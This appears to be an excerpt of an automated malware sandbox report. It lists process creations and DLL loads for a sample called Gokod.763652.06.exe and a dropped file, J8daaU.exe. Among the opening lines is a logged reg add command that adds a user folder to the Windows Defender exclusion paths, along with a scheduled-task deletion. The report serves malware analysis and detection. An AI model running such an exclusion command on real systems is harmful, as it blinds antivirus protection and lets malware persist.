Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 448 -p 7992 -ip 7992
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7992 -s 2280
Source: C:\Windows\System32\WerFault.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\Gokod.763652.06.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exe	Section loaded: pid.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exe	Section loaded: hid.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gokod.763652.06.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: moshost.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mapsbtsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mosstorage.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ztrace_maps.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ztrace_maps.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ztrace_maps.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mapconfiguration.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: aphostservice.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: networkhelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userdataplatformhelperutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: syncutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mccspal.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dmcfgutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mccspal.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dmcmnutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dmxmlhelputils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: inproclogger.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.networking.connectivity.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: synccontroller.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pimstore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: aphostclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: accountaccessor.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: systemeventsbrokerclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userdatalanguageutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mccsengineshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pimstore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cemapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userdatatypehelperutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: phoneutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: storsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fltlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bcd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: storageusage.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: etoken.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: etoken.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: mpclient.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: secur32.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: version.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: msasn1.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: userenv.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: gpapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: wbemcomn.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: amsi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: profapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: wscapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: urlmon.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: iertutil.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: srvcli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: netutils.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: slc.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: weretw.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
